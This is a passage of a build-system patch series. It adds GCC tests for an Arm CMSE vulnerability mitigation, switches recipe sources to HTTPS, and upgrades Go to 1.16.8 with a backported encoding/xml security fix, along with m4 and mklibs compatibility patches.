++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[1,4-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-7a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-7a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-7a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-7a.c 2021-11-11 20:38:44.286766084 -0800
+@@ -0,0 +1,27 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=softfp -mfpu=fpv5-d16 -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=softfp" } } */
++/* { dg-skip-if "Skip these if testing single precision" {*-*-*} {"-mfpu=*-sp-*"} {""} } */
++
++#include "../../../cmse-7.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[0-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[0-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r0, )?(r1, )?(r2, )?(r3, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[0-9\]|r10|fp|ip), ){12}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[0-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-8a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-8a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-8a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp/cmse-8a.c 2021-11-11 20:38:44.290766017 -0800
+@@ -0,0 +1,29 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=softfp -mfpu=fpv5-d16 -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=softfp" } } */
++/* { dg-skip-if "Skip these if testing single precision" {*-*-*} {"-mfpu=*-sp-*"} {""} } */
++
++#include "../../../cmse-8.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[2-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[2-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler-not "mov\tr0, r4" } } */
++/* { dg-final { scan-assembler-not "mov\tr1, r4" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r2, )?(r3, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[2-9\]|r10|fp|ip), ){10}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[2-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-7a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-7a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-7a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-7a.c 2021-11-11 20:38:44.286766084 -0800
+@@ -0,0 +1,27 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=softfp -mfpu=fpv5-sp-d16 -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=softfp" } } */
++/* { dg-skip-if "Skip these if testing double precision" {*-*-*} {"-mfpu=fpv[4-5]-d16"} {""} } */
++
++#include "../../../cmse-7.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[0-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[0-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r0, )?(r1, )?(r2, )?(r3, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[0-9\]|r10|fp|ip), ){12}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[0-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
+diff --git a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-8a.c b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-8a.c
+--- a/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-8a.c 1969-12-31 16:00:00.000000000 -0800
++++ b/gcc/testsuite/gcc.target/arm/cmse/mainline/8_1m/softfp-sp/cmse-8a.c 2021-11-11 20:38:44.286766084 -0800
+@@ -0,0 +1,29 @@
++/* { dg-do compile } */
++/* { dg-options "-mcmse -mfloat-abi=softfp -mfpu=fpv5-sp-d16 -mfix-cmse-cve-2021-35465" } */
++/* { dg-skip-if "Incompatible float ABI" { *-*-* } { "-mfloat-abi=*" } { "-mfloat-abi=softfp" } } */
++/* { dg-skip-if "Skip these if testing double precision" {*-*-*} {"-mfpu=fpv[4-5]-d16"} {""} } */
++
++#include "../../../cmse-8.x"
++
++/* Checks for saving and clearing prior to function call. */
++/* Shift on the same register as blxns. */
++/* { dg-final { scan-assembler "lsrs\t(r\[2-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler "lsls\t(r\[2-9\]|r10|fp|ip), \\1, #1.*blxns\t\\1" } } */
++/* { dg-final { scan-assembler-not "mov\tr0, r4" } } */
++/* { dg-final { scan-assembler-not "mov\tr1, r4" } } */
++/* { dg-final { scan-assembler "push\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++/* { dg-final { scan-assembler "vlstm\tsp" } } */
++/* Check the right registers are cleared and none appears twice. */
++/* { dg-final { scan-assembler "clrm\t\{(r2, )?(r3, )?(r4, )?(r5, )?(r6, )?(r7, )?(r8, )?(r9, )?(r10, )?(fp, )?(ip, )?APSR\}" } } */
++/* Check that the right number of registers is cleared and thus only one
++ register is missing. */
++/* { dg-final { scan-assembler "clrm\t\{((r\[2-9\]|r10|fp|ip), ){10}APSR\}" } } */
++/* Check that no cleared register is used for blxns. */
++/* { dg-final { scan-assembler-not "clrm\t\{\[^\}\]\+(r\[2-9\]|r10|fp|ip),\[^\}\]\+\}.*blxns\t\\1" } } */
++/* Check for v8.1-m variant of erratum work-around. */
++/* { dg-final { scan-assembler "vscclrm\t\{vpr\}" } } */
++/* { dg-final { scan-assembler "vlldm\tsp" } } */
++/* { dg-final { scan-assembler "pop\t\{r4, r5, r6, r7, r8, r9, r10, fp\}" } } */
++
++/* Now we check that we use the correct intrinsic to call. */
++/* { dg-final { scan-assembler "blxns" } } */
diff --git a/meta/recipes-devtools/glide/glide_0.13.3.bb b/meta/recipes-devtools/glide/glide_0.13.3.bb
index 6eb87df7c37..1a5c760cb3d 100644
--- a/meta/recipes-devtools/glide/glide_0.13.3.bb
+++ b/meta/recipes-devtools/glide/glide_0.13.3.bb
@@ -5,7 +5,7 @@ LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2"
GO_IMPORT = "github.com/Masterminds/glide"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https"
SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf"
inherit go
diff --git a/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
index c41177c72b9..ecbd60e72a5 100644
--- a/meta/recipes-devtools/gnu-config/gnu-config_git.bb
+++ b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
@@ -12,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1"
SRCREV = "6faca61810d335c7837f320733fe8e15a1431fc2"
PV = "20210125+git${SRCPV}"
-SRC_URI = "git://git.savannah.gnu.org/config.git \
+SRC_URI = "git://git.savannah.gnu.org/config.git;branch=master \
file://gnu-configize.in"
S = "${WORKDIR}/git"
UPSTREAM_CHECK_COMMITS = "1"
diff --git a/meta/recipes-devtools/go/go-1.16.5.inc b/meta/recipes-devtools/go/go-1.16.8.inc
index bd928e44f8c..acc2300a286 100644
--- a/meta/recipes-devtools/go/go-1.16.5.inc
+++ b/meta/recipes-devtools/go/go-1.16.8.inc
@@ -1,7 +1,7 @@
require go-common.inc
GO_BASEVERSION = "1.16"
-PV = "1.16.5"
+PV = "1.16.8"
FILESEXTRAPATHS_prepend := "${FILE_DIRNAME}/go-${GO_BASEVERSION}:"
LIC_FILES_CHKSUM = "file://LICENSE;md5=5d4950ecb7b26d2c5e4e7b4e0dd74707"
@@ -16,5 +16,11 @@ SRC_URI += "\
file://0007-cmd-go-make-GOROOT-precious-by-default.patch \
file://0008-use-GOBUILDMODE-to-set-buildmode.patch \
file://0009-Revert-cmd-go-make-sure-CC-and-CXX-are-absolute.patch \
+ file://0001-encoding-xml-handle-leading-trailing-or-double-colon.patch \
"
-SRC_URI[main.sha256sum] = "7bfa7e5908c7cc9e75da5ddf3066d7cbcf3fd9fa51945851325eebc17f50ba80"
+SRC_URI[main.sha256sum] = "8f2a8c24b793375b3243df82fdb0c8387486dcc8a892ca1c991aa99ace086b98"
+
+# Upstream don't believe it is a signifiant real world issue and will only
+# fix in 1.17 onwards where we can drop this.
+# https://github.com/golang/go/issues/30999#issuecomment-910470358
+CVE_CHECK_WHITELIST += "CVE-2021-29923"
diff --git a/meta/recipes-devtools/go/go-1.16/0001-encoding-xml-handle-leading-trailing-or-double-colon.patch b/meta/recipes-devtools/go/go-1.16/0001-encoding-xml-handle-leading-trailing-or-double-colon.patch
new file mode 100644
index 00000000000..3c47157d1a1
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.16/0001-encoding-xml-handle-leading-trailing-or-double-colon.patch
@@ -0,0 +1,123 @@
+From 4d014e723165f28b34458edb4aa9136e0fb4c702 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Tue, 27 Oct 2020 00:17:15 +0100
+Subject: [PATCH] encoding/xml: handle leading, trailing, or double colons in
+ names
+
+Before this change, <:name> would parse as <name>, which could cause
+issues in applications that rely on the parse-encode cycle to
+round-trip. Similarly, <x name:=""> would parse as expected but then
+have the attribute dropped when serializing because its name was empty.
+Finally, <a:b:c> would parse and get serialized incorrectly. All these
+values are invalid XML, but to minimize the impact of this change, we
+parse them whole into Name.Local.
+
+This issue was reported by Juho Nurminen of Mattermost as it leads to
+round-trip mismatches. See #43168. It's not being fixed in a security
+release because round-trip stability is not a currently supported
+security property of encoding/xml, and we don't believe these fixes
+would be sufficient to reliably guarantee it in the future.
+
+Fixes CVE-2020-29509
+Fixes CVE-2020-29511
+Updates #43168
+
+Change-Id: I68321c4d867305046f664347192948a889af3c7f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/277892
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+CVE: CVE-2020-29509 CVE-2020-29511
+Upstream-Status: Backport [4d014e723165f28b34458edb4aa9136e0fb4c702]
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ src/encoding/xml/xml.go | 5 ++--
+ src/encoding/xml/xml_test.go | 56 ++++++++++++++++++++++++++++++++++++
+ 2 files changed, 59 insertions(+), 2 deletions(-)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index 384d6ad4b8..c902f1295a 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -1156,8 +1156,9 @@ func (d *Decoder) nsname() (name Name, ok bool) {
+ if !ok {
+ return
+ }
+- i := strings.Index(s, ":")
+- if i < 0 {
++ if strings.Count(s, ":") > 1 {
++ name.Local = s
++ } else if i := strings.Index(s, ":"); i < 1 || i > len(s)-2 {
+ name.Local = s
+ } else {
+ name.Space = s[0:i]
+diff --git a/src/encoding/xml/xml_test.go b/src/encoding/xml/xml_test.go
+index 5a10f5309d..47d0c39167 100644
+--- a/src/encoding/xml/xml_test.go
++++ b/src/encoding/xml/xml_test.go
+@@ -1003,3 +1003,59 @@ func TestTokenUnmarshaler(t *testing.T) {
+ d := NewTokenDecoder(tokReader{})
+ d.Decode(&Failure{})
+ }
++
++func testRoundTrip(t *testing.T, input string) {
++ d := NewDecoder(strings.NewReader(input))
++ var tokens []Token
++ var buf bytes.Buffer
++ e := NewEncoder(&buf)
++ for {
++ tok, err := d.Token()
++ if err == io.EOF {
++ break
++ }
++ if err != nil {
++ t.Fatalf("invalid input: %v", err)
++ }
++ if err := e.EncodeToken(tok); err != nil {
++ t.Fatalf("failed to re-encode input: %v", err)
++ }
++ tokens = append(tokens, CopyToken(tok))
++ }
++ if err := e.Flush(); err != nil {
++ t.Fatal(err)
++ }
++
++ d = NewDecoder(&buf)
++ for {
++ tok, err := d.Token()
++ if err == io.EOF {
++ break
++ }
++ if err != nil {
++ t.Fatalf("failed to decode output: %v", err)
++ }
++ if len(tokens) == 0 {
++ t.Fatalf("unexpected token: %#v", tok)
++ }
++ a, b := tokens[0], tok
++ if !reflect.DeepEqual(a, b) {
++ t.Fatalf("token mismatch: %#v vs %#v", a, b)
++ }
++ tokens = tokens[1:]
++ }
++ if len(tokens) > 0 {
++ t.Fatalf("lost tokens: %#v", tokens)
++ }
++}
++
++func TestRoundTrip(t *testing.T) {
++ tests := map[string]string{
++ "leading colon": `<::Test ::foo="bar"><:::Hello></:::Hello><Hello></Hello></::Test>`,
++ "trailing colon": `<foo abc:="x"></foo>`,
++ "double colon": `<x:y:foo></x:y:foo>`,
++ }
++ for name, input := range tests {
++ t.Run(name, func(t *testing.T) { testRoundTrip(t, input) })
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-binary-native_1.16.5.bb b/meta/recipes-devtools/go/go-binary-native_1.16.8.bb
index b3e2b6a60ee..926222089d0 100644
--- a/meta/recipes-devtools/go/go-binary-native_1.16.5.bb
+++ b/meta/recipes-devtools/go/go-binary-native_1.16.8.bb
@@ -8,8 +8,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5d4950ecb7b26d2c5e4e7b4e0dd74707"
PROVIDES = "go-native"
SRC_URI = "https://dl.google.com/go/go${PV}.${BUILD_GOOS}-${BUILD_GOARCH}.tar.gz;name=go_${BUILD_GOTUPLE}"
-SRC_URI[go_linux_amd64.sha256sum] = "b12c23023b68de22f74c0524f10b753e7b08b1504cb7e417eccebdd3fae49061"
-SRC_URI[go_linux_arm64.sha256sum] = "d5446b46ef6f36fdffa852f73dfbbe78c1ddf010b99fa4964944b9ae8b4d6799"
+SRC_URI[go_linux_amd64.sha256sum] = "f32501aeb8b7b723bc7215f6c373abb6981bbc7e1c7b44e9f07317e1a300dce2"
+SRC_URI[go_linux_arm64.sha256sum] = "430dbe185417204f6788913197ab3b189b6deae9c9b524f262858e53dab239c2"
UPSTREAM_CHECK_URI = "https://golang.org/dl/"
UPSTREAM_CHECK_REGEX = "go(?P<pver>\d+(\.\d+)+)\.linux"
diff --git a/meta/recipes-devtools/go/go-cross-canadian_1.16.5.bb b/meta/recipes-devtools/go/go-cross-canadian_1.16.8.bb
index 7ac9449e476..7ac9449e476 100644
--- a/meta/recipes-devtools/go/go-cross-canadian_1.16.5.bb
+++ b/meta/recipes-devtools/go/go-cross-canadian_1.16.8.bb
diff --git a/meta/recipes-devtools/go/go-cross_1.16.5.bb b/meta/recipes-devtools/go/go-cross_1.16.8.bb
index 80b5a03f6ca..80b5a03f6ca 100644
--- a/meta/recipes-devtools/go/go-cross_1.16.5.bb
+++ b/meta/recipes-devtools/go/go-cross_1.16.8.bb
diff --git a/meta/recipes-devtools/go/go-crosssdk_1.16.5.bb b/meta/recipes-devtools/go/go-crosssdk_1.16.8.bb
index 1857c8a5772..1857c8a5772 100644
--- a/meta/recipes-devtools/go/go-crosssdk_1.16.5.bb
+++ b/meta/recipes-devtools/go/go-crosssdk_1.16.8.bb
diff --git a/meta/recipes-devtools/go/go-native_1.16.5.bb b/meta/recipes-devtools/go/go-native_1.16.8.bb
index f14892cdb0c..f14892cdb0c 100644
--- a/meta/recipes-devtools/go/go-native_1.16.5.bb
+++ b/meta/recipes-devtools/go/go-native_1.16.8.bb
diff --git a/meta/recipes-devtools/go/go-runtime_1.16.5.bb b/meta/recipes-devtools/go/go-runtime_1.16.8.bb
index 63464a15014..63464a15014 100644
--- a/meta/recipes-devtools/go/go-runtime_1.16.5.bb
+++ b/meta/recipes-devtools/go/go-runtime_1.16.8.bb
diff --git a/meta/recipes-devtools/go/go_1.16.5.bb b/meta/recipes-devtools/go/go_1.16.8.bb
index 4e9e0ebec83..4e9e0ebec83 100644
--- a/meta/recipes-devtools/go/go_1.16.5.bb
+++ b/meta/recipes-devtools/go/go_1.16.8.bb
diff --git a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 58d2dee897c..d9e712f74a0 100644
--- a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -4,7 +4,7 @@ DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pu
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
-SRC_URI = "git://github.com/rpm-software-management/libcomps.git \
+SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
file://0001-Add-crc32.c-to-sources-list.patch \
file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
"
diff --git a/meta/recipes-devtools/libdnf/libdnf_0.58.0.bb b/meta/recipes-devtools/libdnf/libdnf_0.58.0.bb
index dbe68d5a15c..30b96bd81d0 100644
--- a/meta/recipes-devtools/libdnf/libdnf_0.58.0.bb
+++ b/meta/recipes-devtools/libdnf/libdnf_0.58.0.bb
@@ -4,7 +4,7 @@ DESCRIPTION = "This library provides a high level package-manager. It's core lib
LICENSE = "LGPLv2.1+"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=dnf-4-master \
+SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=dnf-4-master;protocol=https \
file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
diff --git a/meta/recipes-devtools/librepo/librepo_1.13.0.bb b/meta/recipes-devtools/librepo/librepo_1.13.0.bb
index 0a68e0ac4f3..3f5919d0a20 100644
--- a/meta/recipes-devtools/librepo/librepo_1.13.0.bb
+++ b/meta/recipes-devtools/librepo/librepo_1.13.0.bb
@@ -5,7 +5,7 @@ DESCRIPTION = "${SUMMARY}"
LICENSE = "LGPLv2.1"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
-SRC_URI = "git://github.com/rpm-software-management/librepo.git \
+SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
"
diff --git a/meta/recipes-devtools/llvm/llvm_git.bb b/meta/recipes-devtools/llvm/llvm_git.bb
index db6694339c5..58cdaaa5a9d 100644
--- a/meta/recipes-devtools/llvm/llvm_git.bb
+++ b/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,13 +30,17 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
BRANCH = "release/${MAJOR_VERSION}.x"
SRCREV = "1fdec59bffc11ae37eb51a1b9869f0696bfd5312"
-SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \
+SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
file://0001-nfc-Fix-missing-include.patch;striplevel=2 \
"
+# remove at next version upgrade or when output changes
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
UPSTREAM_CHECK_GITTAGREGEX = "llvmorg-(?P<pver>\d+(\.\d+)+)"
S = "${WORKDIR}/git/llvm"
diff --git a/meta/recipes-devtools/m4/m4-1.4.18.inc b/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6a..6475b02f8b6 100644
--- a/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
file://ac_config_links.patch \
file://m4-1.4.18-glibc-change-work-around.patch \
+ file://0001-c-stack-stop-using-SIGSTKSZ.patch \
"
SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://run-ptest \
diff --git a/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 00000000000..883b8a2075a
--- /dev/null
+++ b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
+From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 30 Apr 2021 17:40:36 -0700
+Subject: [PATCH] c-stack: stop using SIGSTKSZ
+
+This patch is required with glibc 2.34+
+based on gnulib [1]
+
+[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ lib/c-stack.c | 22 +++++++++++++---------
+ 1 file changed, 13 insertions(+), 9 deletions(-)
+
+diff --git a/lib/c-stack.c b/lib/c-stack.c
+index 5353c08..863f764 100644
+--- a/lib/c-stack.c
++++ b/lib/c-stack.c
+@@ -51,13 +51,14 @@
+ typedef struct sigaltstack stack_t;
+ #endif
+ #ifndef SIGSTKSZ
+-# define SIGSTKSZ 16384
+-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
++#define get_sigstksz() (16384)
++#elif HAVE_LIBSIGSEGV
+ /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
+ more than the Linux default of an 8k alternate stack when deciding
+ if a fault was caused by stack overflow. */
+-# undef SIGSTKSZ
+-# define SIGSTKSZ 16384
++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
++#else
++#define get_sigstksz() ((SIGSTKSZ))
+ #endif
+
+ #include <stdlib.h>
+@@ -131,7 +132,8 @@ die (int signo)
+ /* Storage for the alternate signal stack. */
+ static union
+ {
+- char buffer[SIGSTKSZ];
++ /* allocate buffer with size from get_sigstksz() */
++ char *buffer;
+
+ /* These other members are for proper alignment. There's no
+ standard way to guarantee stack alignment, but this seems enough
+@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
+ program_error_message = _("program error");
+ stack_overflow_message = _("stack overflow");
+
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ /* Always install the overflow handler. */
+ if (stackoverflow_install_handler (overflow_handler,
+ alternate_signal_stack.buffer,
+- sizeof alternate_signal_stack.buffer))
++ get_sigstksz()))
+ {
+ errno = ENOTSUP;
+ return -1;
+@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
+ stack_t st;
+ struct sigaction act;
+ st.ss_flags = 0;
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ # if SIGALTSTACK_SS_REVERSED
+ /* Irix mistakenly treats ss_sp as the upper bound, rather than
+ lower bound, of the alternate stack. */
+- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
+- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
++ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
++ st.ss_size = get_sigstksz() - sizeof (void *);
+ # else
+ st.ss_sp = alternate_signal_stack.buffer;
+- st.ss_size = sizeof alternate_signal_stack.buffer;
++ st.ss_size = get_sigstksz();
+ # endif
+ r = sigaltstack (&st, NULL);
+ if (r != 0)
+--
+2.31.1
+
diff --git a/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
new file mode 100644
index 00000000000..f96cc7d302c
--- /dev/null
+++ b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
@@ -0,0 +1,431 @@
+From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Mon, 23 Aug 2021 12:45:11 +0200
+Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for
+ C++ 17
+
+Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2]
+
+based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+---
+ src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++---------------------
+ src/mklibs-readelf/elf.hpp | 18 ++++++++--------
+ src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++----------------
+ 3 files changed, 51 insertions(+), 51 deletions(-)
+
